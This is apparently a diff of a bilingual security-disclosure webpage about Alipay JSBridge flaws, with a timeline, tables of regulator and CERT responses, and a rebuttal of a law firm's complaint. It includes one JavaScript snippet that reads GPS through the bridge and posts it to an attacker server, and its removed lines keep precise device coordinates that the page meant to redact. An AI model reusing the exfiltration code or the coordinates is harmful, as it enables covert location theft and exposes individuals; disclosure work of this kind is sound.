② iOS Silent GPS Exfiltration — No Authorization Prompt (CWE-359, CVSS 7.4)<br>
③ iOS tradePay Unauthorized Payment Flow Invocation (CWE-940, CVSS 8.6)<br>
④ UI Spoofing — showToast/setTitle Fake Alipay Interface (CWE-451, CVSS 8.1)<br>
⑤ End-to-End Sensitive Data Exfiltration — Device Fingerprint + Permission States (CWE-200, CVSS 8.6)<br>
<strong>Batch 2 (1 CVE):</strong><br>
⑥ ds.alipay.com Open Redirect Whitelist Bypass (CWE-601+CWE-939, CVSS 9.3) — Exploits the <code>?scheme=</code> parameter on whitelisted domain ds.alipay.com to perform an open redirect, completely bypassing the vendor's domain whitelist protection. Any internet-hosted page can chain through the whitelisted domain to enter WebView and invoke all JSBridge APIs. This bypass was achieved in under 2 minutes during a live call with the vendor security team<br>
Credit: Jiqiang Feng (Innora AI Security Research). Awaiting MITRE confirmation.</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>全球通知</strong> — 向 23 个金融监管机构、13 个国家 CERT、14 家竞争对手安全团队、50+ 家国际媒体发送漏洞披露通知</span>
<span class="en"><strong>Global Notification</strong> — Vulnerability disclosure sent to 23 financial regulators, 13 national CERTs, 14 competitor security teams, and 50+ international media outlets</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>新加坡 PDPC 正式立案调查</strong> — 新加坡个人数据保护委员会 (PDPC) 回复确认已开启正式调查</span>
<span class="en"><strong>Singapore PDPC Formal Investigation</strong> — Singapore's Personal Data Protection Commission confirmed opening a formal investigation </span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Google Play 启动调查</strong> — 向 Google Play 提交正式政策违规举报违反用户数据政策、权限政策、欺骗行为政策Google 确认收到并回复:"We will investigate and take appropriate action"</span>
<span class="en"><strong>Google Play Investigation</strong> — Formal policy violation report submitted to Google Play (User Data, Permissions, Deceptive Behavior policies). Google confirmed: "We will investigate and take appropriate action" </span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Apple Product Security 启动调查</strong> — Apple 产品安全团队人工回复Brent确认已将报告转发给相关调查团队。Apple 正在调查 Alipay iOS 端 JSBridge 暴露的 tradePay支付、scan扫码、chooseImage相机等高危 API</span>
<span class="en"><strong>Apple Product Security Investigation</strong> — Apple Product Security responded (Brent): "Your report was forwarded along to the appropriate team for investigation." Apple is investigating Alipay iOS JSBridge exposure of tradePay, scan, chooseImage APIs </span>
</p>
</div>
<div class="timeline-item" style="background: linear-gradient(135deg, rgba(0,200,83,0.08), rgba(0,200,83,0.02)); border-left-color: #00c853;">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Packet Storm Security 公开收录</strong> — 漏洞通告被 Packet Storm Security全球知名漏洞数据库正式收录并发布<br><a href="https://packetstorm.news/files/id/217089" target="_blank" style="color:#00c853;font-weight:bold;">https://packetstorm.news/files/id/217089</a><br>标题:"Alipay Open Redirect / API Attacker Payload Insertion"</span>
<span class="en"><strong>Packet Storm Security Publication</strong> — Advisory officially published on Packet Storm Security (major global vulnerability database):<br><a href="https://packetstorm.news/files/id/217089" target="_blank" style="color:#00c853;font-weight:bold;">https://packetstorm.news/files/id/217089</a><br>Title: "Alipay Open Redirect / API Attacker Payload Insertion"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>HKCERT → CNCERT</strong> — 香港计算机应急协调中心 (HKCERT) 确认已将报告转交中国国家网络安全应急响应中心 (CNCERT)</span>
<span class="en"><strong>HKCERT → CNCERT</strong> — Hong Kong CERT confirmed forwarding the report to China National CERT (CNCERT)</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>荷兰央行 (DNB) 正式回复</strong> — 指出 CSSF 卢森堡为 Alipay 欧洲的主要监管机构,提供 GDPR 第32条处理安全性违规执法路径。CERT-Luxembourg (CIRCL) 事件处理分析师 Michael Hamm 确认将寻找 Alipay 欧洲实体联系人转发报告</span>
<span class="en"><strong>DNB Netherlands Formal Response</strong> — Identified CSSF Luxembourg as Alipay Europe's Primary Supervisory Authority, provided GDPR Article 32 enforcement pathway. CERT-Luxembourg (CIRCL) incident handler Michael Hamm confirmed locating appropriate Alipay European entity contact to forward the report</span>
</p>
</div>
</div>
@@ -736,7 +1002,7 @@ body.lang-en .en { display: block; }
</p>
<pre><code>// GPS 定位窃取
AlipayJSBridge.call("getLocation", {}, function(result) {
// result = {lat: 5.460012, lng: 100.314139, city: "槟城"}
// result = {lat: "[脱敏]", lng: "[脱敏]", city: "槟城"}
exfiltrate("GPS", result); // POST to attacker server
});
@@ -1039,13 +1305,14 @@ startActivity(i);
<span class="zh">三台设备 GPS 数据</span><span class="en">GPS Data from 3 Devices</span>
</div>
<pre><code>// Samsung S25 Ultra — Auckland, New Zealand
{"lat": -36.707669, "lng": 174.719378, "city": "奥克兰", "country": "新西兰", "accuracy": 25}
{"lat": "[脱敏]", "lng": "[脱敏]", "city": "奥克兰", "country": "新西兰", "accuracy": 25}
// Redmi 23129RN51X — Penang, Malaysia
{"lat": 5.460012, "lng": 100.314139, "city": "槟城", "country": "马来西亚", "accuracy": 35}
{"lat": "[脱敏]", "lng": "[脱敏]", "city": "槟城", "country": "马来西亚", "accuracy": 35}
// iPhone 16 Pro — Hangzhou, China
{"lat": 30.306882, "lng": 120.121303, "city": "杭州市"}</code></pre>
// iPhone 16 Pro — Hangzhou, China (厂商安全业务负责人设备全程无GPS授权声明/弹窗)
// 3轮测试精度: 17.4m → 8.8mlocationReducedAccuracy: 0精确定位页面加载到回传约7秒
{"lat": "[脱敏]", "lng": "[脱敏]", "city": "杭州市"}</code></pre>
</div>
</div>
@@ -1151,8 +1418,8 @@ startActivity(i);
"accuracy": 35,
"city": "槟城",
"country": "马来西亚",
"latitude": 5.460012,
"longitude": 100.314139
"latitude": "[脱敏]",
"longitude": "[脱敏]"
}
}
}
@@ -1493,7 +1760,7 @@ Language/zh-Hant Region/CN</code></pre>
<h3>我们的回应</h3>
<p>我们充分尊重厂商的判断。但以下事实不会因为判定结论而改变:</p>
<ol>
<li><strong>数据确实外传了。</strong> 308条服务器日志不是模拟的GPS坐标 5.460012, 100.314139 确实从支付宝 WebView 发送到了我们的服务器。这个事实不受"是否是漏洞"的判定影响。</li>
<li><strong>数据确实外传了。</strong> 308条服务器日志不是模拟的GPS 坐标(指向槟城市区)确实从支付宝 WebView 发送到了我们的服务器。这个事实不受"是否是漏洞"的判定影响。</li>
<li><strong>转账页面确实被外部触发了。</strong> <code>startApp</code> 返回 <code>success: true</code>,转账页面确实打开了,攻击者的账号确实被预填了。这个事实不受"是否是漏洞"的判定影响。</li>
<li><strong>用户没有被充分告知。</strong> "继续访问"警告中<strong>没有</strong>告诉用户"该网站将获得调用支付宝内部API的能力包括读取您的GPS位置、打开转账页面等"。用户不知道点击"继续访问"意味着什么。</li>
<li><strong>防护机制的不一致性。</strong> 既然 <code>clipboard</code><code>getUserInfo</code> 被正确拦截了,那 <code>getLocation</code><code>startApp</code> 为什么不需要同样的保护同一个安全框架对不同API的处理方式不一致这至少说明有改进空间。</li>
@@ -1512,7 +1779,7 @@ Language/zh-Hant Region/CN</code></pre>
<h3>Our Response</h3>
<p>We fully respect the vendor's judgment. However, the following facts do not change based on the classification decision:</p>
<ol>
<li><strong>Data was indeed exfiltrated.</strong> The 308 server log entries are not simulated. GPS coordinates 5.460012, 100.314139 were indeed transmitted from Alipay WebView to our server. This fact is independent of whether it's classified as a "vulnerability."</li>
<li><strong>Data was indeed exfiltrated.</strong> The 308 server log entries are not simulated. GPS coordinates (pointing to Penang urban area) were indeed transmitted from Alipay WebView to our server. This fact is independent of whether it's classified as a "vulnerability."</li>
<li><strong>The transfer page was indeed triggered externally.</strong> <code>startApp</code> returned <code>success: true</code>, the transfer page opened, and the attacker's account was pre-filled. This fact is independent of the classification.</li>
<li><strong>Users are not adequately informed.</strong> The "Continue to visit" warning does <strong>not</strong> tell users: "This website will gain the ability to call Alipay internal APIs, including reading your GPS location, opening transfer pages, etc." Users don't know what clicking "Continue" means.</li>
<li><strong>Defense mechanism inconsistency.</strong> If <code>clipboard</code> and <code>getUserInfo</code> are correctly blocked, why don't <code>getLocation</code> and <code>startApp</code> receive the same protection? The inconsistent treatment of different APIs within the same security framework at minimum indicates room for improvement.</li>
@@ -1528,6 +1795,244 @@ Language/zh-Hant Region/CN</code></pre>
</div>
</section>
<!-- ==================== 9.5 GLOBAL REGULATORY RESPONSE ==================== -->
<section id="global-response">
<h2><span class="num">09½</span>
<span class="zh">全球监管机构响应</span>
<span class="en">Global Regulatory Response</span>
</h2>
<div class="callout" style="border-color: var(--green); background: rgba(68,204,136,.06);">
<p>
<span class="zh"><strong>截至 2026-03-14</strong>:我们向全球 22 个国家/地区的约 160 个监管机构、CERT、隐私保护组织和安全社区发送了约 189 封安全通报邮件。以下是已收到明确受理结果的机构汇总。</span>
<span class="en"><strong>As of 2026-03-14</strong>: We sent approximately 189 security notification emails to ~160 regulatory bodies, CERTs, privacy authorities, and security communities across 22 countries/regions. Below is a summary of organizations that have provided definitive responses.</span>
</p>
</div>
<div class="zh">
<h3 style="color: var(--accent); margin-top: 24px;">一、正式调查/立案 (7个)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">机构</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">国家</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">状态</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">关键信息</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">1</td>
<td style="padding:8px 12px;"><strong>HKMA 香港金融管理局</strong></td>
<td style="padding:8px 12px;">🇭🇰 香港</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>正式投诉立案</strong></td>
<td style="padding:8px 12px;">零售支付监管处高级主任受理SVF储值支付工具牌照持有人正式投诉表格已提交7日确认窗口</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">2</td>
<td style="padding:8px 12px;"><strong>PDPC 新加坡个人数据保护委员会</strong></td>
<td style="padding:8px 12px;">🇸🇬 新加坡</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>正在调查</strong></td>
<td style="padding:8px 12px;">隐私保护委员会正式立案调查</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">3</td>
<td style="padding:8px 12px;"><strong>Apple Product Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 美国</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>转交调查团队</strong></td>
<td style="padding:8px 12px;">Apple 产品安全团队人工回复确认,已将报告转发给专门调查团队,正在调查 Alipay iOS 端 JSBridge 暴露的高危 API</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">4</td>
<td style="padding:8px 12px;"><strong>Google Play</strong></td>
<td style="padding:8px 12px;">🇺🇸 美国</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>政策违规调查</strong></td>
<td style="padding:8px 12px;">"We will investigate and take appropriate action"</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">5</td>
<td style="padding:8px 12px;"><strong>MITRE CVE</strong></td>
<td style="padding:8px 12px;">🇺🇸 美国</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>6个CVE待分配</strong></td>
<td style="padding:8px 12px;">通过 CNA-LR 路径提交6个CVE请求CVSS 7.49.3),已确认收到</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">6</td>
<td style="padding:8px 12px;"><strong>CSSF 卢森堡金融监管委员会</strong></td>
<td style="padding:8px 12px;">🇱🇺 卢森堡</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Whistleblowing立案 + ICT Risk确认</strong></td>
<td style="padding:8px 12px;">4个部门/通道确认收到Whistleblowing团队立案 + ICT Risk Supervision 人工确认×2 + Reclamation确认ICT风险监管部门明确表示"已知悉报告内容",已提交补充证据(联动 2025 年反洗钱处罚记录)</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">7</td>
<td style="padding:8px 12px;"><strong>Packet Storm Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 美国</td>
<td style="padding:8px 12px; color: var(--green);"><strong>已公开发布</strong></td>
<td style="padding:8px 12px;"><a href="https://packetstorm.news/files/id/217089" target="_blank">Advisory #217089</a> — "Alipay Open Redirect / API Attacker Payload Insertion"</td>
</tr>
</tbody>
</table>
</div>
<h3 style="color: var(--yellow); margin-top: 24px;">二、确认收到并转交/处理中 (11个)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">机构</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">国家</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">回复内容</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">1</td><td style="padding:8px 12px;"><strong>CIRCL 卢森堡CERT</strong></td><td style="padding:8px 12px;">🇱🇺 卢森堡</td><td style="padding:8px 12px;">事件处理分析师人工回复,<strong>已代我们联系 Alibaba Security Response Center</strong></td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">2</td><td style="padding:8px 12px;"><strong>ANSSI / CERT-FR 法国</strong></td><td style="padding:8px 12px;">🇫🇷 法国</td><td style="padding:8px 12px;">"已转交相关部门处理,将尽快回复"</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">3</td><td style="padding:8px 12px;"><strong>HKCERT 香港</strong></td><td style="padding:8px 12px;">🇭🇰 香港</td><td style="padding:8px 12px;"><strong>已正式转交CNCERT</strong>(中国国家互联网应急中心)</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">4</td><td style="padding:8px 12px;"><strong>FMA 新西兰金融管理局</strong></td><td style="padding:8px 12px;">🇳🇿 新西兰</td><td style="padding:8px 12px;">"信息已记录,正在考虑是否对 Alipay 采取进一步行动"</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">5</td><td style="padding:8px 12px;"><strong>FCA 英国金融行为监管局</strong></td><td style="padding:8px 12px;">🇬🇧 英国</td><td style="padding:8px 12px;">Whistleblowing 团队确认收到,正在审查(涉及 AIUK Services Limited, 原 Alipay UK Ltd</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">6</td><td style="padding:8px 12px;"><strong>DNB 荷兰央行</strong></td><td style="padding:8px 12px;">🇳🇱 荷兰</td><td style="padding:8px 12px;">Cyber Defense Center 确认收到,引导至监管通道处理</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">7</td><td style="padding:8px 12px;"><strong>OJK 印尼金融监管局</strong></td><td style="padding:8px 12px;">🇮🇩 印尼</td><td style="padding:8px 12px;">要求补充详细说明,已回复完整技术报告</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">8</td><td style="padding:8px 12px;"><strong>OAIC 澳大利亚信息专员</strong></td><td style="padding:8px 12px;">🇦🇺 澳大利亚</td><td style="padding:8px 12px;">Intake 团队确认收到投诉</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">9</td><td style="padding:8px 12px;"><strong>EDPB 欧盟数据保护委员会</strong></td><td style="padding:8px 12px;">🇪🇺 欧盟</td><td style="padding:8px 12px;">确认收到跨境数据保护投诉</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">10</td><td style="padding:8px 12px;"><strong>ThaiCERT 泰国</strong></td><td style="padding:8px 12px;">🇹🇭 泰国</td><td style="padding:8px 12px;">"已转交负责人"</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">11</td><td style="padding:8px 12px;"><strong>BNM 马来西亚央行</strong></td><td style="padding:8px 12px;">🇲🇾 马来西亚</td><td style="padding:8px 12px;">工单确认收到</td></tr>
</tbody>
</table>
</div>
<h3 style="color: var(--text2); margin-top: 24px;">三、自动确认/模板回复 (8个)</h3>
<p>BSP 菲律宾央行、OSFI 加拿大金融监管、Privacy International、ProPublica、CNA/Mediacorp 新加坡、Datatilsynet 丹麦数据保护、DSB 奥地利数据保护、IMY 瑞典数据保护。</p>
<h3 style="margin-top: 24px;">情况概述</h3>
<div class="callout info">
<ul style="margin:0; padding-left: 20px;">
<li>总发送 <strong>~189 封</strong>,覆盖 <strong>22 个国家/地区</strong>,约 160 个目标</li>
<li>送达率 <strong>~90%</strong>(退信经过 4 轮修正补发)</li>
<li>收到回复 <strong>39+ 个</strong>(回复率 ~23%</li>
<li><strong>7 个正式调查/立案</strong>HKMA、PDPC、Apple、Google、MITRE、CSSF、Packet Storm</li>
<li><strong>CIRCL 卢森堡国家CERT</strong> 主动代我们联系 Alibaba Security Response Center</li>
<li><strong>HKCERT → CNCERT</strong>:唯一能直接触达中国大陆实体的监管路径已启动</li>
</ul>
</div>
<p style="margin-top:16px; color: var(--text2); font-size: 13px;"><em>注:为保护正在进行中的调查程序,部分案件编号和联系人邮箱已脱敏。本表将随调查进展持续更新。</em></p>
</div>
<div class="en">
<h3 style="color: var(--accent); margin-top: 24px;">I. Formal Investigations / Case Filed (7)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Organization</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Country</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Status</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Key Information</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">1</td>
<td style="padding:8px 12px;"><strong>HKMA (Hong Kong Monetary Authority)</strong></td>
<td style="padding:8px 12px;">🇭🇰 Hong Kong</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Formal Complaint Filed</strong></td>
<td style="padding:8px 12px;">Assigned to Senior Officer at Retail Payment Oversight Division. SVF licensee complaint form submitted.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">2</td>
<td style="padding:8px 12px;"><strong>PDPC (Personal Data Protection Commission)</strong></td>
<td style="padding:8px 12px;">🇸🇬 Singapore</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Under Investigation</strong></td>
<td style="padding:8px 12px;">Formal investigation case opened.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">3</td>
<td style="padding:8px 12px;"><strong>Apple Product Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Forwarded to Investigation Team</strong></td>
<td style="padding:8px 12px;">Human response from Product Security confirming report forwarded to investigation team. Investigating high-risk JSBridge APIs exposed on Alipay iOS.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">4</td>
<td style="padding:8px 12px;"><strong>Google Play</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Policy Violation Investigation</strong></td>
<td style="padding:8px 12px;">"We will investigate and take appropriate action."</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">5</td>
<td style="padding:8px 12px;"><strong>MITRE CVE</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>6 CVEs Pending Assignment</strong></td>
<td style="padding:8px 12px;">6 CVE requests submitted via CNA-LR pathway (CVSS 7.49.3). Receipt confirmed.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">6</td>
<td style="padding:8px 12px;"><strong>CSSF (Luxembourg Financial Regulator)</strong></td>
<td style="padding:8px 12px;">🇱🇺 Luxembourg</td>
<td style="padding:8px 12px; color: var(--accent);"><strong>Whistleblowing Case + ICT Risk Confirmed</strong></td>
<td style="padding:8px 12px;">4 departments/channels acknowledged (Whistleblowing case filed + ICT Risk Supervision confirmed ×2 + Reclamation confirmed). ICT Risk Supervision explicitly stated they "take note of the contents." Supplementary evidence submitted linking to 2025 AML penalty.</td>
</tr>
<tr style="border-bottom:1px solid var(--border);">
<td style="padding:8px 12px;">7</td>
<td style="padding:8px 12px;"><strong>Packet Storm Security</strong></td>
<td style="padding:8px 12px;">🇺🇸 USA</td>
<td style="padding:8px 12px; color: var(--green);"><strong>Published</strong></td>
<td style="padding:8px 12px;"><a href="https://packetstorm.news/files/id/217089" target="_blank">Advisory #217089</a></td>
</tr>
</tbody>
</table>
</div>
<h3 style="color: var(--yellow); margin-top: 24px;">II. Acknowledged & Transferred (11)</h3>
<div style="overflow-x: auto;">
<table style="width:100%; border-collapse:collapse; font-size:14px; margin:16px 0;">
<thead>
<tr style="background: var(--surface2); text-align:left;">
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">#</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Organization</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Country</th>
<th style="padding:10px 12px; border-bottom:2px solid var(--border);">Response</th>
</tr>
</thead>
<tbody>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">1</td><td style="padding:8px 12px;"><strong>CIRCL (National CERT Luxembourg)</strong></td><td style="padding:8px 12px;">🇱🇺</td><td style="padding:8px 12px;">Incident handler responded personally. <strong>Contacted Alibaba SRC on our behalf.</strong></td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">2</td><td style="padding:8px 12px;"><strong>ANSSI / CERT-FR</strong></td><td style="padding:8px 12px;">🇫🇷</td><td style="padding:8px 12px;">"Forwarded to the appropriate department."</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">3</td><td style="padding:8px 12px;"><strong>HKCERT</strong></td><td style="padding:8px 12px;">🇭🇰</td><td style="padding:8px 12px;"><strong>Forwarded to CNCERT</strong> (China's National CERT).</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">4</td><td style="padding:8px 12px;"><strong>FMA</strong></td><td style="padding:8px 12px;">🇳🇿</td><td style="padding:8px 12px;">"Considering whether to take further action."</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">5</td><td style="padding:8px 12px;"><strong>FCA</strong></td><td style="padding:8px 12px;">🇬🇧</td><td style="padding:8px 12px;">Whistleblowing team reviewing (AIUK Services Ltd, formerly Alipay UK Ltd).</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">6</td><td style="padding:8px 12px;"><strong>DNB</strong></td><td style="padding:8px 12px;">🇳🇱</td><td style="padding:8px 12px;">Cyber Defense Center acknowledged, routed to supervisory channel.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">7</td><td style="padding:8px 12px;"><strong>OJK</strong></td><td style="padding:8px 12px;">🇮🇩</td><td style="padding:8px 12px;">Requested details. Full technical report provided.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">8</td><td style="padding:8px 12px;"><strong>OAIC</strong></td><td style="padding:8px 12px;">🇦🇺</td><td style="padding:8px 12px;">Intake team confirmed receipt.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">9</td><td style="padding:8px 12px;"><strong>EDPB</strong></td><td style="padding:8px 12px;">🇪🇺</td><td style="padding:8px 12px;">Acknowledged cross-border data protection complaint.</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">10</td><td style="padding:8px 12px;"><strong>ThaiCERT</strong></td><td style="padding:8px 12px;">🇹🇭</td><td style="padding:8px 12px;">"Forwarded to the responsible person."</td></tr>
<tr style="border-bottom:1px solid var(--border);"><td style="padding:8px 12px;">11</td><td style="padding:8px 12px;"><strong>BNM</strong></td><td style="padding:8px 12px;">🇲🇾</td><td style="padding:8px 12px;">Ticket acknowledged.</td></tr>
</tbody>
</table>
</div>
<h3 style="color: var(--text2); margin-top: 24px;">III. Auto-Acknowledgments (8)</h3>
<p>BSP (Philippines), OSFI (Canada), Privacy International, ProPublica (USA), CNA/Mediacorp (Singapore), Datatilsynet (Denmark), DSB (Austria), IMY (Sweden).</p>
<h3 style="margin-top: 24px;">Overview</h3>
<div class="callout info">
<ul style="margin:0; padding-left: 20px;">
<li>Total sent: <strong>~189 emails</strong> across <strong>22 countries/regions</strong>, ~160 targets</li>
<li>Delivery rate: <strong>~90%</strong> (bounces corrected through 4 rounds)</li>
<li>Responses: <strong>39+</strong> (~23% response rate)</li>
<li><strong>7 formal investigations</strong>: HKMA, PDPC, Apple, Google, MITRE, CSSF, Packet Storm</li>
<li><strong>CIRCL</strong> proactively contacted Alibaba SRC on our behalf</li>
<li><strong>HKCERT → CNCERT</strong>: The only pathway to mainland China entities activated</li>
</ul>
</div>
<p style="margin-top:16px; color: var(--text2); font-size: 13px;"><em>Note: To protect ongoing investigations, certain case reference numbers and contact emails have been redacted. This table will be updated as investigations progress.</em></p>
</div>
</section>
<!-- ==================== 10. RECOMMENDATIONS ==================== -->
<section id="recommendations">
<h2><span class="num">10</span>
@@ -1627,34 +2132,134 @@ Language/zh-Hant Region/CN</code></pre>
</table>
</section>
<!-- ==================== LEGAL RESPONSE ==================== -->
<section id="legal-response">
<h2><span class="num">⚖️</span>
<span class="zh">法律投诉回应</span>
<span class="en">Legal Complaint Response</span>
</h2>
<div class="zh">
<div class="callout" style="border-left:4px solid var(--accent);background:rgba(255,68,68,.08);padding:20px;border-radius:0 8px 8px 0;margin-bottom:24px;">
<p style="margin-bottom:12px;"><strong>投诉单号:</strong>[已隐藏]</p>
<p style="margin-bottom:12px;"><strong>投诉时间:</strong>2026-03-11 22:45:59文章发布仅4小时29分钟后</p>
<p style="margin-bottom:12px;"><strong>投诉方:</strong>北京格韵律师事务所(证件号 31110000MD0196493T</p>
<p style="margin-bottom:12px;"><strong>投诉分类:</strong>内容侵犯名誉/商誉/隐私/肖像</p>
<p style="margin-bottom:0;"><strong>投诉平台:</strong>微信公众平台</p>
</div>
<h3>我们的立场:投诉不成立</h3>
<p><strong>1. 文章未指名任何企业</strong> — 我们在微信公众号发布的文章全文零次出现"支付宝""Alipay""蚂蚁集团"或任何可识别特定企业的名称。根据《民法典》第1024条名誉权/商誉侵权需满足"针对特定主体"的构成要件。投诉方通过主动投诉,反而自行确认了文章内容与其委托人的关联性。</p>
<p><strong>2. 内容属实且有完整证据链</strong> — 根据《民法典》第1025条行为人为公共利益实施舆论监督影响他人名誉的不承担民事责任前提是内容属实且未超出合理限度。我们的文章基于308条服务器日志、3台真实设备测试、42张截图。所有结论均可独立复现验证。</p>
<p><strong>3. 厂商安全团队亲自验证了漏洞</strong> — 在私下报告阶段,厂商安全团队指派业务负责人与我们协同验证。该人员使用自有 iPhone 16 Pro 在杭州测试时GPS 坐标被直接回传至我们的服务器,<strong>全程无任何 GPS 授权弹窗</strong>。这直接推翻了投诉方"调用位置权限均以弹窗告知用户"的主张。此次验证还发现 iOS 版本攻击面显著大于 Android——额外暴露 tradePay支付SDK、share蠕虫传播等 5 个敏感 API。</p>
<p><strong>4. 厂商自身定性消除侵权基础</strong> — 厂商安全团队在亲自验证上述事实后仍于2026年3月10日回复"这些属于正常功能"。讨论一款应用的"正常功能"从逻辑上不可能构成"商誉侵权"。当企业明知风险存在而选择不修复,再通过法律手段阻止公众知情——这不是维权,这是掩盖。</p>
<p><strong>5. 消费者知情权</strong> — 《消费者权益保护法》第八条规定消费者享有知悉其购买、使用的商品或者接受的服务的真实情况的权利。当10亿+用户的支付工具存在可被外部链接利用的功能设计时,安全研究和公众讨论属于正当行使公共监督权。</p>
<p><strong>6. 负责任披露程序完整合规</strong> — 我们在公开前进行了4轮私下报告2026-02-25至2026-03-07等待厂商回应至明确答复"正常功能"。参照 ISO/IEC 29147:2018 和 Google Project Zero 90天标准我们的程序完全合规。</p>
<p>我们已向微信公众平台提交完整申诉材料。如投诉方对技术事实有异议,欢迎通过第三方技术鉴定机构验证。</p>
<p style="font-size:14px;color:var(--text2);margin-top:20px;"><strong>详细反驳文章:</strong><a href="https://innora.ai/zfb/rebuttal.html">支付宝安全研究遭律师函投诉——一篇零次提及"支付宝"的文章如何构成"商誉侵权"</a></p>
</div>
<div class="en">
<div class="callout" style="border-left:4px solid var(--accent);background:rgba(255,68,68,.08);padding:20px;border-radius:0 8px 8px 0;margin-bottom:24px;">
<p style="margin-bottom:12px;"><strong>Complaint #:</strong> [redacted]</p>
<p style="margin-bottom:12px;"><strong>Filed:</strong> 2026-03-11 22:45:59 (only 4 hours 29 minutes after article publication)</p>
<p style="margin-bottom:12px;"><strong>Complainant:</strong> Beijing Geyun Law Firm (License: 31110000MD0196493T)</p>
